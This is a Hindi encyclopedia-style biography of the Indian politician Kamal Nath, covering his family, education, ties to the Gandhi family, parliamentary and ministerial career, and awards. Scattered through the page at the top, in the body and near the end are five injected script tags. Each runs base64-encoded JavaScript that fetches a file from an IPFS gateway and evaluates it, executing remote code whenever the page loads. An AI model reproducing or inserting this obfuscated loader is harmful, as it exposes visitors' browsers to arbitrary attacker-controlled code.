कमलनाथ  

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
कमलनाथ
पूरा नाम कमलनाथ
जन्म 18 नवंबर, 1946
जन्म भूमि कानपुर, उत्तर प्रदेश
अभिभावक पिता- महेंद्रनाथ, माता- लीलानाथ
पति/पत्नी अलकानाथ
संतान दो बेटे- नकुलनाथ व बकुलनाथ
नागरिकता भारतीय
प्रसिद्धि राजनीतिज्ञ
पार्टी भारतीय राष्ट्रीय कांग्रेस
कार्य काल पूर्व मुख्यमंत्री, मध्य प्रदेश- 17 दिसंबर, 2018 से 23 मार्च, 2020 तक

वाणिज्य एवं उद्योग मंत्री, भारत सरकार- मई, 2004 से मई, 2009 तक

विद्यालय सेंट ज़ेवियर कॉलेज, कोलकाता
अन्य जानकारी कमलनाथ कांग्रेस के कार्यकाल में उद्योग मंत्रालय, कपड़ा मंत्रालय, वन और पर्यावरण मंत्रालय, सड़क और परिवहन मंत्रालय की भी जिम्मेदारी संभाल चुके है।
अद्यतन‎

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>कमलनाथ (अंग्रेज़ी: Kamalnath, जन्म- 18 नवंबर, 1946, कानपुर, उत्तर प्रदेश) भारतीय राष्ट्रीय कांग्रेस के राजनीतिज्ञ हैं। वे मध्य प्रदेश के पूर्व मुख्यमंत्री एवं कुशल राजनीतिज्ञ हैं। कमलनाथ पूर्व में केंद्रीय शहरी विकास मंत्री एवं केंद्रीय सड़क परिवहन मंत्री रह चुके है। भारत के सबसे लंबे समय तक सेवारत लोकसभा सदस्यों में से वह एक हैं। कमलनाथ मध्य प्रदेश के छिंदवाड़ा संसदीय क्षेत्र का प्रतिनिधित्व करते है और नौ बार इसी क्षेत्र से लोकसभा में जीत दर्ज कर चुके हैं। कमलनाथ को मई, 2018 में मध्य प्रदेश कांग्रेस कमेटी के अध्यक्ष के रूप में निर्वाचित किया गया था।

परिचय

मध्य प्रदेश के राजनेता कमलनाथ का जन्म 18 नवम्बर, 1946 को उत्तर प्रदेश के कानपुर में हुआ है। उनके माता-पिता का नाम लीलानाथ और महेंद्रनाथ है। कमलनाथ का विवाह अलकानाथ से हुआ है और उनके दो बेटे नकुलनाथ व बकुलनाथ हैं। कमलनाथ की पत्नी अलकानाथ समाज सेविका हैं। कमलनाथ की प्रारंभिक शिक्षा देहरादून के दून स्कूल से हुई। इसके बाद आगे की पढ़ाई के लिए वे कोलकाता के सेंट ज़ेवियर कॉलेज चले गए।[१]

गांधी परिवार से दोस्ती

आपात काल के समय कांग्रेस नेता संजय गांधी के साथ कमलनाथ की दोस्ती थी। इसलिए वह लगातार राजनीति में आगे बढ़ते गए। जिसके बाद वह लगातार राजनीति में सक्रिय रहे और 34 साल की उम्र में वह छिंदवाड़ा से जीत कर पहली बार लोकसभा सदस्य बने। गांधी परिवार से दोस्ती के कारण वह इंदिरा गांधी के बेटे समान हो गए। 1980 में कांग्रेस ने उन्हें मध्य प्रदेश के छिंदवाड़ा से टिकट दिया। उनके चुनाव प्रचार में इंदिरा गांधी ने अपने भाषण में कहा था कि 'मैं चाहती हूं कि आप मेरे तीसरे बेटे कमलनाथ को वोट दें'। इसलिए इंदिरा गांधी की हत्या के बाद से लेकर अभी तक कमलनाथ कांग्रेस के लिए हमेशा प्रतिबद्ध रहे हैं।

संजय गांधी के लिए जेलयात्रा

संजय गाँधी और कमलनाथ, इन दोनों की दोस्ती का एक क़िस्सा मशहूर है-
कमलनाथ और संजय गांधी की दोस्ती इतनी पक्की थी कि जब आपात काल के बाद संजय गांधी गिरफ्तार किए गए तो तो कमलनाथ भी बाहर नहीं रह पाए। अपने दोस्त संजय गांधी को जेल में कोई परेशनी न हो, इसलिए कमलनाथ भी जज के साथ बदतमीज़ी करके तिहाड़ जेल पहुंच गए थे।[१]

आदिवासियों के लिए कार्य

कमलनाथ सात बार लोकसभा सदस्य रहे। आदिवासी क्षेत्र छिंदवाड़ा के लिए कमलनाथ ने यहां आदिवासियों को रोजगार और जिंदगी दी है। छिंदवाड़ा का विकास उनके लिए जनता के दिलों में जगह बनाए रखता है। इसके अलावा वह कांग्रेस के कार्यकाल में उद्योग मंत्रालय, कपड़ा मंत्रालय, वन और पर्यावरण मंत्रालय, सड़क और परिवहन मंत्रालय की भी जिम्मेदारी संभाल चुके है। इतना ही नहीं वह अपना दिल्ली का कार्यालय 24 घंटे कार्यकर्ताओं के लिए खुला रखते हैं।

राजनीतिक कॅरियर

  • 1980, 1985, 1989, 1998, 1999, 2004, 2009 में लोकसभा सांसद चुने गए।[२]
  • जून 1991 में पर्यावरण और वन मंत्री बने।
  • 1995 में केंद्रीय राज्य वस्त्र मंत्री रहे।
  • 2001 में कांग्रेस के महासचिव रहे।
  • 2004 - वाणिज्य और उद्योग मंत्री केंद्रीय मंत्रिमंडल।

बिजनेस कॅरियर

  • प्रबंधन प्रौद्योगिकी संस्थान (आईएमटी) के लिए गवर्नर बोर्ड के अध्यक्ष।
  • मध्य प्रदेश बाल विकास परिषद के अध्यक्ष।

पुरस्कार

  1. 2006 : जबलपुर के रानी दुर्गावती विश्वविद्यालय द्वारा डॉक्टरेट की उपाधि से सम्मानित।
  2. 2007 : एफडीआई पत्रिका और फाइनेंशियल टाइम्स बिजनेस द्वारा एफडीआई पर्सनैलिटी ऑफ द ईयर आवार्ड।
  3. 2008 : इकोनॉमिक टाइम्स द्वारा "बिजनेस रिफार्मर ऑफ द ईयर" शीर्षक से सम्मानित किया गया।
  4. 2011 : 2.73 अरब रुपये की संपत्ति के साथ भारत के सबसे अमीर कैबिनेट मंत्री।
पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

  1. १.० १.१ कमलनाथ की पत्नी, जाति और संपत्ति (हिंदी) m.dailyhunt.in। अभिगमन तिथि: 18 अक्टूबर, 2020।
  2. कमल नाथ की जीवनी (हिंदी) elections.in। अभिगमन तिथि: 18 अक्टूबर, 2020।

संबंधित लेख

पंद्रहवीं लोकसभा सांसद

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

वर्णमाला क्रमानुसार लेख खोज

                              अं                                                                                                       क्ष    त्र    ज्ञ             श्र   अः



"https://amp.bharatdiscovery.org/w/index.php?title=कमलनाथ&oldid=662232" से लिया गया